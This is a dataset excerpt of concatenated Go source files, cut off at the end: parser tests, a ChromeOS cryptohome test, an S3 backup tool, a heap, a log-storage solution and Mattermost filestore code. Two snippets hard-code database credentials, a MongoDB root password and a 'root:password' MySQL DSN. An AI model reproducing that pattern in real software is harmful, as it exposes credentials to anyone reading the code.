text stringlengths 11 4.05M |
|---|
package zh_test
import (
"github.com/olebedev/when"
"github.com/stretchr/testify/require"
"testing"
"time"
)
// now is the fixed reference time every fixture is parsed against.
var now = time.Date(2022, time.March, 14, 0, 0, 0, 0, time.UTC)

// Fixture describes one parser test case.
type Fixture struct {
	Text   string        // input handed to the parser
	Index  int           // expected match start index within Text
	Phrase string        // expected matched substring
	Diff   time.Duration // expected offset of the parsed time from now
}
// ApplyFixtures runs every fixture through the parser and asserts the
// match index, matched phrase, and time offset against the expectations.
func ApplyFixtures(t *testing.T, name string, w *when.Parser, fixt []Fixture) {
	for i := range fixt {
		f := fixt[i]
		res, err := w.Parse(f.Text, now)
		require.Nil(t, err, "[%s] err #%d", name, i)
		require.NotNil(t, res, "[%s] res #%d", name, i)
		require.Equal(t, f.Index, res.Index, "[%s] index #%d", name, i)
		require.Equal(t, f.Phrase, res.Text, "[%s] text #%d", name, i)
		require.Equal(t, f.Diff, res.Time.Sub(now), "[%s] diff #%d", name, i)
	}
}
// ApplyFixturesNil runs every fixture through the parser and asserts that
// parsing succeeds but produces no match at all.
func ApplyFixturesNil(t *testing.T, name string, w *when.Parser, fixt []Fixture) {
	for i := range fixt {
		res, err := w.Parse(fixt[i].Text, now)
		require.Nil(t, err, "[%s] err #%d", name, i)
		require.Nil(t, res, "[%s] res #%d", name, i)
	}
}
|
package controllers
import (
"bytes"
"fmt"
"github.com/UniversityRadioYork/myradio-go"
"github.com/UniversityRadioYork/ury-ical/models"
"github.com/UniversityRadioYork/ury-ical/structs"
"github.com/gorilla/mux"
"github.com/jaytaylor/html2text"
"net/http"
"strconv"
"strings"
"text/template"
)
// ShowController is the controller for a single show's calendar page.
type ShowController struct {
	Controller
}
// NewShowController returns a new ShowController with the MyRadio session s
// and configuration context c.
func NewShowController(s *myradio.Session, c *structs.Config) *ShowController {
	base := Controller{session: s, config: c}
	return &ShowController{base}
}
// Get handles the HTTP GET request r for a show's calendar, writing the
// rendered ICAL to w. The show is identified by the "id" route variable.
func (ic *ShowController) Get(w http.ResponseWriter, r *http.Request) {
	im := models.NewShowModel(ic.session)

	vars := mux.Vars(r)
	// Reject non-numeric show IDs instead of silently treating them as 0
	// (the original discarded the Atoi error).
	id, err := strconv.Atoi(vars["id"])
	if err != nil {
		http.Error(w, "invalid show id", http.StatusBadRequest)
		return
	}

	show, timeslots, err := im.Get(id)
	if err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}

	// Copy the configured calendar and specialise its name for this show.
	cal := ic.config.Calendar
	cal.NAME = fmt.Sprintf("%s - %s", cal.NAME, show.Title)
	cal.X_WR_CALNAME = cal.NAME

	t := template.New("calendar template")
	t.Funcs(template.FuncMap{
		"html2text": html2text.FromString,
		"trim":      strings.TrimSpace,
	})
	// Report a broken description template instead of executing a nil
	// template later (the original discarded the Parse error).
	t, err = t.Parse(ic.config.CalendarDescription)
	if err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}

	var desc bytes.Buffer
	data := structs.CalendarTemplateData{
		Show:   show,
		Config: *ic.config,
	}
	err = t.Execute(&desc, data)
	if err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}

	cal.DESCRIPTION = desc.String()
	cal.X_WR_CALDESC = cal.DESCRIPTION

	ic.renderICAL(cal, timeslots, w)
}
|
// Copyright 2022 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package cryptohome
import (
"context"
"fmt"
"os"
"time"
"chromiumos/tast/common/fixture"
"chromiumos/tast/common/hwsec"
"chromiumos/tast/common/policy"
"chromiumos/tast/common/policy/fakedms"
"chromiumos/tast/ctxutil"
"chromiumos/tast/local/bundles/cros/cryptohome/cleanup"
"chromiumos/tast/local/chrome"
"chromiumos/tast/local/cryptohome"
"chromiumos/tast/local/disk"
hwseclocal "chromiumos/tast/local/hwsec"
"chromiumos/tast/local/policyutil"
"chromiumos/tast/local/upstart"
"chromiumos/tast/testing"
)
// init registers the test with the tast framework.
func init() {
	testing.AddTest(&testing.Test{
		Func:         AutomaticCleanupCritical,
		LacrosStatus: testing.LacrosVariantUnneeded,
		Desc:         "Test critical automatic disk cleanup",
		Contacts: []string{
			"vsavu@google.com",     // Test author
			"gwendal@chromium.com", // Lead for ChromeOS Storage
		},
		Attr:         []string{"group:mainline", "informational"},
		Fixture:      fixture.FakeDMSEnrolled,
		VarDeps:      []string{"ui.signinProfileTestExtensionManifestKey"},
		SoftwareDeps: []string{"chrome"},
	})
}
// AutomaticCleanupCritical verifies that critical automatic disk cleanup is
// controlled by the DeviceRunAutomaticCleanupOnLogin policy: when the policy
// is unset or true, remounting a user while disk space is critically low
// cleans up the other user's vault; when it is false, no cleanup runs.
func AutomaticCleanupCritical(ctx context.Context, s *testing.State) {
	fdms := s.FixtValue().(*fakedms.FakeDMS)

	for _, param := range []struct {
		name      string                                   // name is the subtest name.
		policy    *policy.DeviceRunAutomaticCleanupOnLogin // policy is the policy we test.
		shouldRun bool                                     // shouldRun indicates whether the cleanup should run.
	}{
		{
			name:      "unset",
			policy:    &policy.DeviceRunAutomaticCleanupOnLogin{Stat: policy.StatusUnset},
			shouldRun: true,
		},
		{
			name:      "false",
			policy:    &policy.DeviceRunAutomaticCleanupOnLogin{Val: false},
			shouldRun: false,
		},
		{
			name:      "true",
			policy:    &policy.DeviceRunAutomaticCleanupOnLogin{Val: true},
			shouldRun: true,
		},
	} {
		s.Run(ctx, param.name, func(ctx context.Context, s *testing.State) {
			// Start a Chrome instance that will fetch policies from the FakeDMS.
			cr, err := chrome.New(ctx,
				chrome.NoLogin(),
				chrome.DMSPolicy(fdms.URL),
				chrome.KeepEnrollment(),
				chrome.LoadSigninProfileExtension(s.RequiredVar("ui.signinProfileTestExtensionManifestKey")),
			)
			if err != nil {
				s.Fatal("Chrome start failed: ", err)
			}
			defer cr.Close(ctx)

			tconn, err := cr.SigninProfileTestAPIConn(ctx)
			if err != nil {
				s.Fatal("Failed to open tconn: ", err)
			}

			// Update policies.
			pb := policy.NewBlob()
			pb.AddPolicies([]policy.Policy{param.policy})
			if err := fdms.WritePolicyBlob(pb); err != nil {
				s.Fatal("Failed to write policies: ", err)
			}
			if err := policyutil.Refresh(ctx, tconn); err != nil {
				s.Fatal("Failed to update policies: ", err)
			}
			if err := policyutil.Verify(ctx, tconn, []policy.Policy{param.policy}); err != nil {
				s.Fatal("Failed to verify policies: ", err)
			}

			const (
				homedirSize   = 100 * cleanup.MiB // 100 MiB, used for testing
				temporaryUser = "tmp-user"
				user1         = "critical-cleanup-user1"
				user2         = "critical-cleanup-user2"
				password      = "1234"
			)

			cmdRunner := hwseclocal.NewCmdRunner()
			helper, err := hwseclocal.NewHelper(cmdRunner)
			if err != nil {
				s.Fatal("Failed to create hwsec local helper: ", err)
			}
			daemonController := helper.DaemonController()

			// Start cryptohomed and wait for it to be available.
			if err := daemonController.Ensure(ctx, hwsec.CryptohomeDaemon); err != nil {
				s.Fatal("Failed to start cryptohomed: ", err)
			}
			defer daemonController.Restart(ctx, hwsec.CryptohomeDaemon)

			// Reserve time for the deferred daemon restart above.
			ctx, cancel := ctxutil.Shorten(ctx, 10*time.Second)
			defer cancel()

			freeSpace, err := disk.FreeSpace(cleanup.UserHome)
			if err != nil {
				s.Fatal("Failed to get the amount of free space")
			}
			// Raise every cleanup threshold 50 MiB above the current free
			// space so any subsequent mount counts as critically low on disk.
			cleanupThreshold := freeSpace + 50*1024*1024
			cleanupThresholdsArgs := fmt.Sprintf("--cleanup_threshold=%d --aggressive_cleanup_threshold=%d --critical_cleanup_threshold=%d --target_free_space=%d", cleanupThreshold, cleanupThreshold, cleanupThreshold, cleanupThreshold)

			// Restart with higher thresholds. Restart also needed to make sure policies are applied.
			if err := upstart.RestartJob(ctx, "cryptohomed", upstart.WithArg("VMODULE_ARG", "*=1"), upstart.WithArg("CRYPTOHOMED_ARGS", cleanupThresholdsArgs)); err != nil {
				s.Fatal("Failed to restart cryptohome: ", err)
			}

			if err := cleanup.RunOnExistingUsers(ctx); err != nil {
				s.Fatal("Failed to perform initial cleanup: ", err)
			}

			// Create users with contents to fill up disk space.
			_, err = cleanup.CreateFilledUserHomedir(ctx, user1, password, "Downloads", homedirSize)
			if err != nil {
				s.Fatal("Failed to create user with content: ", err)
			}
			defer cryptohome.RemoveVault(ctx, user1)

			fillFile2, err := cleanup.CreateFilledUserHomedir(ctx, user2, password, "Downloads", homedirSize)
			if err != nil {
				s.Fatal("Failed to create user with content: ", err)
			}
			defer cryptohome.RemoveVault(ctx, user2)
			// Unmount all users before removal.
			defer cryptohome.UnmountAll(ctx)

			// Make sure to unmount the second user.
			if err := cryptohome.UnmountVault(ctx, user2); err != nil {
				s.Fatal("Failed to unmount user vault: ", err)
			}

			// Remount the second user. Since space is very low, other user should be cleaned up.
			if err := cryptohome.CreateVault(ctx, user2, password); err != nil {
				s.Fatal("Failed to remount user vault: ", err)
			}
			if err := cryptohome.WaitForUserMount(ctx, user2); err != nil {
				s.Fatal("Failed to remount user vault: ", err)
			}

			// Check if the users are correctly present.
			if _, err := os.Stat(fillFile2); err != nil {
				s.Error("Data for user2 lost: ", err)
			}

			shouldExist := !param.shouldRun
			if exists, err := cleanup.UserHomeExists(ctx, user1); err != nil {
				// Typo fix: message previously read "dermine".
				s.Fatal("Failed to determine if user vault exists: ", err)
			} else if exists != shouldExist {
				s.Errorf("User vault unexpectedly exists: got %t; want %t", exists, shouldExist)
			}
		})
	}
}
|
package main
import (
"fmt"
"log"
"os"
"time"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-sdk-go/service/s3"
"github.com/aws/aws-sdk-go/service/s3/s3manager"
)
// Command-line configuration, populated once in init.
var (
	configPath string // path to the MySQL configuration file
	backupName string // name used for the dump
	bucket     string // target S3 bucket
	prefix     string // key prefix; NOTE(review): set but not used in main as shown — confirm intended
)

// init validates the argument count and reads the three positional
// arguments; it terminates the process with a usage message otherwise.
func init() {
	if len(os.Args) != 4 {
		log.Fatalln("Usage:", os.Args[0], "<config path> <backup name> <bucket>")
	}
	configPath = os.Args[1]
	backupName = os.Args[2]
	bucket = os.Args[3]
	prefix = "database"
}
// main dumps the MySQL database, uploads the dump to S3, and prints a
// presigned URL (1 hour expiry) for fetching the uploaded object.
func main() {
	mysql := &MySQL{
		ConfigFile: configPath,
		Name:       backupName,
	}

	fmt.Print("==> Starting MySQL Dump...")
	dump := mysql.Dump()
	if dump.Error != nil {
		log.Println("There's an error!")
		panic(dump.Error)
	}
	fmt.Println("Done!")

	fmt.Printf("==> Uploading %v to S3 Bucket: %v", dump.Path, bucket)
	file, err := os.Open(dump.Path)
	if err != nil {
		log.Fatal("Open failed:", err)
	}
	defer file.Close()

	// session.NewSession replaces the deprecated session.New and surfaces
	// configuration errors instead of deferring them.
	sess, err := session.NewSession(&aws.Config{Region: aws.String("us-east-1")})
	if err != nil {
		log.Fatalln("Session failed:", err)
	}

	uploader := s3manager.NewUploader(sess)
	uploadRes, err := uploader.Upload(&s3manager.UploadInput{
		Bucket: aws.String(bucket),
		Key:    aws.String(file.Name()),
		Body:   file,
	})
	// BUG FIX: check the upload error BEFORE using uploadRes — the original
	// dereferenced a nil result (and deleted the local dump) on failure.
	if err != nil {
		log.Fatalln("Upload failed:", err)
	}
	log.Print(uploadRes.Location)

	// Remove the local dump only after a successful upload.
	os.Remove(dump.Path)

	svc := s3.New(sess)
	req, _ := svc.GetObjectRequest(&s3.GetObjectInput{
		Bucket: aws.String(bucket),
		Key:    aws.String(file.Name()),
	})
	// Presign a request with 1 hour expiration.
	url, err := req.Presign(60 * time.Minute)
	if err != nil {
		log.Fatal("Unable to get Presigned URL:", err)
	}
	fmt.Println(url)
}
|
package main
import "fmt"
// heap is a binary min-heap over ints backed by a slice.
// (why not just `type heap []int`? — kept as a struct for API stability)
type heap struct {
	data []int
}

// insert adds element e to the heap, restoring the min-heap invariant.
func (h *heap) insert(e int) {
	// append handles growth, including from zero capacity; the original
	// doubling code (cap*2) could never grow a zero-capacity slice.
	h.data = append(h.data, e)
	// Sift the new element up while it is smaller than its parent.
	this := len(h.data) - 1
	for this > 0 && h.data[this] < h.data[up(this)] {
		h.data[this], h.data[up(this)] = h.data[up(this)], h.data[this]
		// BUG FIX: follow the element up the tree; the original never
		// advanced `this`, so elements only ever moved one level.
		this = up(this)
	}
}

// pop removes and returns the minimum element. Panics on an empty heap
// (same contract as the original).
func (h *heap) pop() int {
	val := h.data[0]
	last := len(h.data) - 1
	h.data[0] = h.data[last]
	h.data = h.data[:last]
	// Sift the relocated root down until neither child is smaller.
	this := 0
	for {
		min := this
		if l := left(this); l < len(h.data) && h.data[l] < h.data[min] {
			min = l
		}
		if r := right(this); r < len(h.data) && h.data[r] < h.data[min] {
			min = r
		}
		if min == this {
			break
		}
		h.data[this], h.data[min] = h.data[min], h.data[this]
		// BUG FIX: continue sifting from the child position; the original
		// restarted at the root and stopped after a single level, leaving
		// deeper invariant violations in place.
		this = min
	}
	return val
}

// create builds a heap containing the elements of s. The input slice is not
// modified; storage is pre-sized to len(s).
func create(s []int) *heap {
	h := new(heap)
	h.data = make([]int, 0, len(s))
	for _, v := range s {
		h.insert(v)
	}
	return h
}

// up returns the parent index of node i.
func up(i int) int { return (i - 1) / 2 }

// left returns the left-child index of node i.
func left(i int) int { return i*2 + 1 }

// right returns the right-child index of node i.
func right(i int) int { return i*2 + 2 }
// main demonstrates the heap: builds one, inserts an extra element, then
// drains it (heap sort) and prints the state before and after.
func main() {
	h := create([]int{99, 5, 2, 3, 11, 9, 21834})
	h.insert(33)
	fmt.Println(h)

	// try heap sorting
	for i := 0; i < 8; i++ {
		fmt.Println(h.pop())
	}

	fmt.Println(h)
}
|
package input
import (
"encoding/json"
)
// EKS holds the credentials and identifiers needed to target an EKS cluster.
type EKS struct {
	AWSRegion    string `json:"aws_region"`
	AWSAccessKey string `json:"aws_access_key"`
	AWSSecretKey string `json:"aws_secret_key"`
	ClusterName  string `json:"cluster_name"`
}

// GetInput serializes the EKS input to JSON.
func (eks *EKS) GetInput() ([]byte, error) {
	return json.Marshal(eks)
}

// GetEKSInput deserializes an EKS input from JSON.
func GetEKSInput(bytes []byte) (*EKS, error) {
	var res EKS
	if err := json.Unmarshal(bytes, &res); err != nil {
		return &res, err
	}
	return &res, nil
}
|
package leetcode_0635_设计日志存储系统
/*
你将获得多条日志,每条日志都有唯一的 id 和 timestamp,timestamp 是形如 Year:Month:Day:Hour:Minute:Second 的字符串
例如 2017:01:01:23:59:59,所有值域都是零填充的十进制数。
设计一个日志存储系统实现如下功能:
void Put(int id, string timestamp):
给定日志的 id 和 timestamp,将这个日志存入你的存储系统中。
int[] Retrieve(String start, String end, String granularity):
返回在给定时间区间内的所有日志的 id。start 、 end 和 timestamp 的格式相同,granularity 表示考虑的时间级。
比如,start = "2017:01:01:23:59:59", end = "2017:01:02:23:59:59", granularity = "Day" 代表区间 2017 年 1 月 1 日到 2017 年 1 月 2 日。
样例 1 :
put(1, "2017:01:01:23:59:59");
put(2, "2017:01:01:22:59:59");
put(3, "2016:01:01:00:00:00");
retrieve("2016:01:01:01:01:01","2017:01:01:23:00:00","Year"); // 返回值 [1,2,3],返回从 2016 年到 2017 年所有的日志。
retrieve("2016:01:01:01:01:01","2017:01:01:23:00:00","Hour"); // 返回值 [1,2], 返回从 2016:01:01:01 到 2017:01:01:23 区间内的日志,日志 3 不在区间内。
注释 :
Put 和 Retrieve 的指令总数不超过 300。
年份的区间是 [2000,2017],小时的区间是 [00,23]。
Retrieve 的输出顺序不作要求。
*/
// LogSystem stores log ids and their timestamps in parallel slices,
// preserving insertion order.
type LogSystem struct {
	ids []int
	ts  []string
}

// Constructor returns an empty LogSystem.
func Constructor() LogSystem {
	return LogSystem{[]int{}, []string{}}
}

// Put stores a log entry with the given id and timestamp
// ("Year:Month:Day:Hour:Minute:Second", zero-padded fields).
func (ls *LogSystem) Put(id int, timestamp string) {
	ls.ids = append(ls.ids, id)
	ls.ts = append(ls.ts, timestamp)
}

// keyMap maps a granularity name to the prefix length of the timestamp
// string that is significant at that granularity.
var keyMap = map[string]int{
	"Year":   4,  // [0:4]
	"Month":  7,  // [0:7]
	"Day":    10, // [0:10]
	"Hour":   13, // [0:13]
	"Minute": 16, // [0:16]
	"Second": 19, // [0:19]
}

// Retrieve returns the ids of all logs whose timestamp lies in [s, e] when
// every timestamp is truncated to granularity gra. Because the fields are
// zero-padded and ordered most-significant first, plain lexicographic string
// comparison of the prefixes is equivalent to comparing the times — no
// parsing needed.
func (ls *LogSystem) Retrieve(s string, e string, gra string) []int {
	cut := keyMap[gra]
	lo, hi := s[:cut], e[:cut]
	var res []int
	for i, id := range ls.ids {
		if p := ls.ts[i][:cut]; lo <= p && p <= hi {
			res = append(res, id)
		}
	}
	return res
}
/**
* Your LogSystem object will be instantiated and called as such:
* obj := Constructor();
* obj.Put(id,timestamp);
* param_2 := obj.Retrieve(s,e,gra);
*/
|
package common
import (
"github.com/globalsign/mgo"
"log"
"time"
)
// AppBus carries process-wide shared resources; currently only the Mongo
// session.
type AppBus struct {
	MongoDbSession *mgo.Session
}

// appBus is the lazily-created singleton returned by GetAppBus.
var (
	appBus *AppBus
)
// GetAppBus lazily creates and returns the process-wide AppBus singleton.
// On first use it dials MongoDB; a dial failure terminates the process.
// NOTE(review): not goroutine-safe — confirm callers are single-threaded at
// startup, or guard with sync.Once.
func GetAppBus() *AppBus {
	if appBus != nil {
		return appBus
	}

	// SECURITY(review): credentials are hard-coded; they should come from
	// configuration or the environment.
	dialInfo := mgo.DialInfo{
		Addrs:     []string{"127.0.0.1"},
		Direct:    false,
		Timeout:   time.Second * 1,
		Database:  "ip_pool",
		Source:    "admin",
		Username:  "root",
		Password:  "315215241",
		PoolLimit: 4096, // Session.SetPoolLimit
	}
	session, err := mgo.DialWithInfo(&dialInfo)
	if err != nil {
		log.Fatalf("open mongo db fail. error: %v", err.Error())
	}

	// BUG FIX: cache the instance. The original never assigned appBus, so
	// every call dialed a brand-new Mongo session, defeating the singleton.
	appBus = &AppBus{
		MongoDbSession: session,
	}
	return appBus
}
|
package infra
import "database/sql"
// SqlHandler wraps a database connection pool.
type SqlHandler struct {
	Conn *sql.DB
}

// NewSqlHandler opens a MySQL connection pool for the dict database and
// panics if the driver rejects the configuration. Note that sql.Open does
// not dial the server, so connectivity errors surface on first use.
func NewSqlHandler() *SqlHandler {
	conn, err := sql.Open("mysql", "root:password@tcp(localhost:3306)/dict")
	if err != nil {
		// BUG FIX: the original called panic(err.Error) — passing the
		// method value itself, not the message. Panic with the error.
		panic(err)
	}
	handler := new(SqlHandler)
	handler.Conn = conn
	return handler
}
|
// Copyright 2022 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package apps
import (
"context"
"time"
"github.com/golang/protobuf/ptypes/empty"
"google.golang.org/grpc"
"chromiumos/tast/errors"
"chromiumos/tast/local/chrome"
"chromiumos/tast/local/chrome/ash"
"chromiumos/tast/local/common"
pb "chromiumos/tast/services/cros/apps"
"chromiumos/tast/testing"
)
// defaultAppLaunchTimeout is the fallback timeout, in seconds, used when a
// LaunchAppRequest does not specify TimeoutSecs.
const defaultAppLaunchTimeout = 60

// init registers the gRPC apps service with the tast framework.
func init() {
	var svc service
	testing.AddService(&testing.Service{
		Register: func(srv *grpc.Server, s *testing.ServiceState) {
			// Share state with other services through the process-wide
			// shared-object singleton.
			svc = service{sharedObject: common.SharedObjectsForServiceSingleton}
			pb.RegisterAppsServiceServer(srv, &svc)
		},
		GuaranteeCompatibility: true,
	})
}
// service implements tast.cros.apps.AppsService.
type service struct {
	sharedObject *common.SharedObjectsForService
}
// LaunchApp launches the installed app whose name equals req.AppName and
// waits until ash reports it open. A zero req.TimeoutSecs is replaced with
// defaultAppLaunchTimeout; the same timeout bounds both the install poll and
// the wait for the app to open.
func (svc *service) LaunchApp(ctx context.Context, req *pb.LaunchAppRequest) (*empty.Empty, error) {
	if req.TimeoutSecs == 0 {
		req.TimeoutSecs = defaultAppLaunchTimeout
	}
	return common.UseTconn(ctx, svc.sharedObject, func(tconn *chrome.TestConn) (*empty.Empty, error) {
		// Resolve the app name to an ID, polling until the app shows up as
		// installed or the timeout expires.
		appID, err := getInstalledAppID(ctx, tconn, func(app *ash.ChromeApp) bool {
			return app.Name == req.AppName
		}, &testing.PollOptions{Timeout: time.Duration(req.TimeoutSecs) * time.Second})
		if err != nil {
			return nil, err
		}
		// Launch via the autotestPrivate extension API.
		if err := tconn.Call(ctx, nil, `tast.promisify(chrome.autotestPrivate.launchApp)`, appID); err != nil {
			return nil, errors.Wrapf(err, "failed to launch app %s", req.AppName)
		}
		// Block until the launched app is actually visible to ash.
		if err := ash.WaitForApp(ctx, tconn, appID, time.Duration(req.TimeoutSecs)*time.Second); err != nil {
			return nil, errors.Wrapf(err, "app %s never opened", req.AppName)
		}
		return &empty.Empty{}, nil
	})
}
// GetPrimaryBrowser returns the App used for the primary browser.
func (svc *service) GetPrimaryBrowser(ctx context.Context, req *empty.Empty) (*pb.App, error) {
	return common.UseTconn(ctx, svc.sharedObject, func(tconn *chrome.TestConn) (*pb.App, error) {
		app, err := PrimaryBrowser(ctx, tconn)
		if err != nil {
			return nil, err
		}
		// Convert the local app descriptor into the protobuf App message.
		return &pb.App{Id: app.ID, Name: app.Name}, nil
	})
}
// LaunchPrimaryBrowser launches the primary browser and returns the App
// launched. The launch uses the default timeout (TimeoutSecs left zero).
func (svc *service) LaunchPrimaryBrowser(ctx context.Context, req *empty.Empty) (*pb.App, error) {
	app, err := svc.GetPrimaryBrowser(ctx, req)
	if err != nil {
		return app, err
	}
	_, err = svc.LaunchApp(ctx, &pb.LaunchAppRequest{AppName: app.Name})
	return app, err
}
|
package graphs
import "../core"
// BreadthFirstSearch returns the values of all nodes reachable from d, in
// breadth-first visit order.
func (d *DirectedNode) BreadthFirstSearch() []int {
	q := new(core.Queue)
	q.Enqueue(d)

	var visited []*DirectedNode
	// BUG FIX: the original dequeued in the for-loop's init clause and then
	// tested Size() != 0, so the most recently dequeued node was never
	// processed — for a start node with no neighbors the result was empty.
	for q.Size() != 0 {
		n, _ := q.Dequeue()
		curr := n.(*DirectedNode)
		for _, neighbor := range curr.neighbors {
			// Enqueue only nodes neither processed nor already queued.
			// NOTE(review): curr itself is in neither set while being
			// processed, so a self-loop/back-edge can re-enqueue it —
			// confirm whether that needs handling (behavior unchanged).
			if !(sliceContains(visited, neighbor) || q.Contains(neighbor, compareNode)) {
				q.Enqueue(neighbor)
			}
		}
		visited = append(visited, curr)
	}

	// extract the actual values
	var out []int
	for _, n := range visited {
		out = append(out, n.value)
	}
	return out
}
|
// Copyright (c) 2015-present Mattermost, Inc. All Rights Reserved.
// See LICENSE.txt for license information.
//
package aws
import (
"fmt"
"github.com/aws/aws-sdk-go-v2/aws/arn"
"github.com/mattermost/mattermost-cloud/model"
"github.com/pkg/errors"
log "github.com/sirupsen/logrus"
corev1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)
// S3MultitenantFilestore is a filestore backed by a shared AWS S3 bucket.
type S3MultitenantFilestore struct {
	installationID string  // installation whose files live under a directory in the shared bucket
	awsClient      *Client // AWS API wrapper used for all provisioning calls
}
// NewS3MultitenantFilestore returns a filestore for the given installation,
// backed by the shared AWS S3 bucket.
func NewS3MultitenantFilestore(installationID string, awsClient *Client) *S3MultitenantFilestore {
	fs := new(S3MultitenantFilestore)
	fs.installationID = installationID
	fs.awsClient = awsClient
	return fs
}
// Provision completes all the steps necessary to provision an S3 multitenant
// filestore.
func (f *S3MultitenantFilestore) Provision(store model.InstallationDatabaseStoreInterface, logger log.FieldLogger) error {
	if err := f.s3FilestoreProvision(store, logger); err != nil {
		return errors.Wrap(err, "failed to provision AWS multitenant S3 filestore")
	}
	return nil
}
// Teardown removes all AWS resources related to a shared S3 filestore: the
// installation's IAM user and stored access key, and — unless keepData is
// set — the installation's directory in the shared bucket.
func (f *S3MultitenantFilestore) Teardown(keepData bool, store model.InstallationDatabaseStoreInterface, logger log.FieldLogger) error {
	awsID := CloudID(f.installationID)

	logger = logger.WithFields(log.Fields{
		"awsID":          awsID,
		"filestore-type": "s3-multitenant",
	})
	logger.Info("Tearing down AWS S3 filestore")

	bucketName, err := f.awsClient.GetMultitenantBucketNameForInstallation(f.installationID, store)
	if err != nil {
		// Perform a manual check to see if no cluster installations were ever
		// created for this installation.
		clusterInstallations, ciErr := store.GetClusterInstallations(&model.ClusterInstallationFilter{
			Paging:         model.AllPagesWithDeleted(),
			InstallationID: f.installationID,
		})
		if ciErr != nil {
			return errors.Wrap(ciErr, "failed to query cluster installations")
		}
		if len(clusterInstallations) == 0 {
			// Nothing was ever provisioned, so there is nothing to remove.
			logger.Warn("No cluster installations found for installation; assuming multitenant filestore was never created")
			return nil
		}
		return errors.Wrap(err, "failed to find multitenant bucket")
	}
	logger = logger.WithField("s3-bucket-name", bucketName)

	// Remove IAM/secret resources first; data removal follows below.
	err = f.awsClient.iamEnsureUserDeleted(awsID, logger)
	if err != nil {
		return errors.Wrap(err, "failed to delete AWS IAM user")
	}
	err = f.awsClient.secretsManagerEnsureIAMAccessKeySecretDeleted(awsID, logger)
	if err != nil {
		return errors.Wrap(err, "failed to delete IAM access key secret")
	}
	if keepData {
		logger.Info("AWS S3 bucket was left intact due to the keep-data setting of this server")
		return nil
	}
	err = f.awsClient.S3EnsureBucketDirectoryDeleted(bucketName, f.installationID, logger)
	if err != nil {
		return errors.Wrap(err, "unable to ensure that AWS S3 filestore was deleted")
	}
	logger.Debug("AWS multitenant S3 filestore was deleted")

	return nil
}
// GenerateFilestoreSpecAndSecret creates the k8s filestore spec and secret for
// accessing the shared S3 bucket: the secret carries the installation's IAM
// access key, and the config points at the regional S3 URL and bucket.
func (f *S3MultitenantFilestore) GenerateFilestoreSpecAndSecret(store model.InstallationDatabaseStoreInterface, logger log.FieldLogger) (*model.FilestoreConfig, *corev1.Secret, error) {
	awsID := CloudID(f.installationID)

	logger = logger.WithFields(log.Fields{
		"awsID":          awsID,
		"filestore-type": "s3-multitenant",
	})
	logger.Debug("Generating S3 multitenant filestore information")

	bucketName, err := f.awsClient.GetMultitenantBucketNameForInstallation(f.installationID, store)
	if err != nil {
		return nil, nil, errors.Wrap(err, "failed to find multitenant bucket")
	}
	logger = logger.WithField("s3-bucket-name", bucketName)

	// The access key was stored in Secrets Manager during provisioning.
	iamAccessKey, err := f.awsClient.secretsManagerGetIAMAccessKey(awsID)
	if err != nil {
		return nil, nil, err
	}

	filestoreSecretName := fmt.Sprintf("%s-iam-access-key", f.installationID)
	filestoreSecret := &corev1.Secret{
		ObjectMeta: metav1.ObjectMeta{
			Name: filestoreSecretName,
		},
		StringData: map[string]string{
			"accesskey": iamAccessKey.ID,
			"secretkey": iamAccessKey.Secret,
		},
	}

	S3RegionURL := f.awsClient.GetS3RegionURL()

	filestoreConfig := &model.FilestoreConfig{
		URL:    S3RegionURL,
		Bucket: bucketName,
		Secret: filestoreSecretName,
	}

	logger.Debug("AWS multitenant S3 filestore configuration generated for cluster installation")

	return filestoreConfig, filestoreSecret, nil
}
// s3FilestoreProvision provisions a shared S3 filestore for an installation:
// it creates an IAM user, attaches an S3 policy scoped to the installation's
// directory in the shared bucket, creates an access key, and stores that key
// in Secrets Manager.
func (f *S3MultitenantFilestore) s3FilestoreProvision(store model.InstallationDatabaseStoreInterface, logger log.FieldLogger) error {
	awsID := CloudID(f.installationID)

	logger = logger.WithFields(log.Fields{
		"awsID":          awsID,
		"filestore-type": "s3-multitenant",
	})
	logger.Info("Provisioning AWS multitenant S3 filestore")

	bucketName, err := f.awsClient.GetMultitenantBucketNameForInstallation(f.installationID, store)
	if err != nil {
		return errors.Wrap(err, "failed to find multitenant bucket")
	}
	logger = logger.WithField("s3-bucket-name", bucketName)

	user, err := f.awsClient.iamEnsureUserCreated(awsID, logger)
	if err != nil {
		return err
	}

	// The IAM policy lookup requires the AWS account ID for the ARN. The user
	// object contains this ID so we will use that.
	arn, err := arn.Parse(*user.Arn)
	if err != nil {
		return err
	}
	policyARN := fmt.Sprintf("arn:aws:iam::%s:policy/%s", arn.AccountID, awsID)

	policy, err := f.awsClient.iamEnsureS3PolicyCreated(awsID, policyARN, bucketName, f.installationID, logger)
	if err != nil {
		return err
	}
	err = f.awsClient.iamEnsurePolicyAttached(awsID, policyARN, logger)
	if err != nil {
		return err
	}
	logger.WithFields(log.Fields{
		"iam-policy-name": *policy.PolicyName,
		"iam-user-name":   *user.UserName,
	}).Debug("AWS IAM policy attached to user")

	ak, err := f.awsClient.iamEnsureAccessKeyCreated(awsID, logger)
	if err != nil {
		return err
	}
	logger.WithField("iam-user-name", *user.UserName).Debug("AWS IAM user access key created")

	// Persist the key so GenerateFilestoreSpecAndSecret can retrieve it.
	err = f.awsClient.secretsManagerEnsureIAMAccessKeySecretCreated(awsID, ak, logger)
	if err != nil {
		return err
	}
	logger.WithField("iam-user-name", *user.UserName).Debug("AWS secrets manager secret created")

	return nil
}
|
package handlers
import (
	"bytes"
	"encoding/json"
	"fmt"
	"net/http"
)
// respond writes the provided HTTP status code and the JSON encoding of
// value to the response writer. The value is encoded into a buffer first so
// that an encoding failure can still produce a proper 500 response — the
// original called WriteHeader before encoding, making the subsequent
// http.Error a no-op (the status line was already sent).
func respond(w http.ResponseWriter, statusCode int, value interface{}) {
	var buf bytes.Buffer
	if err := json.NewEncoder(&buf).Encode(value); err != nil {
		http.Error(w, fmt.Sprintf("Error converting response value to JSON: %v", err), http.StatusInternalServerError)
		return
	}
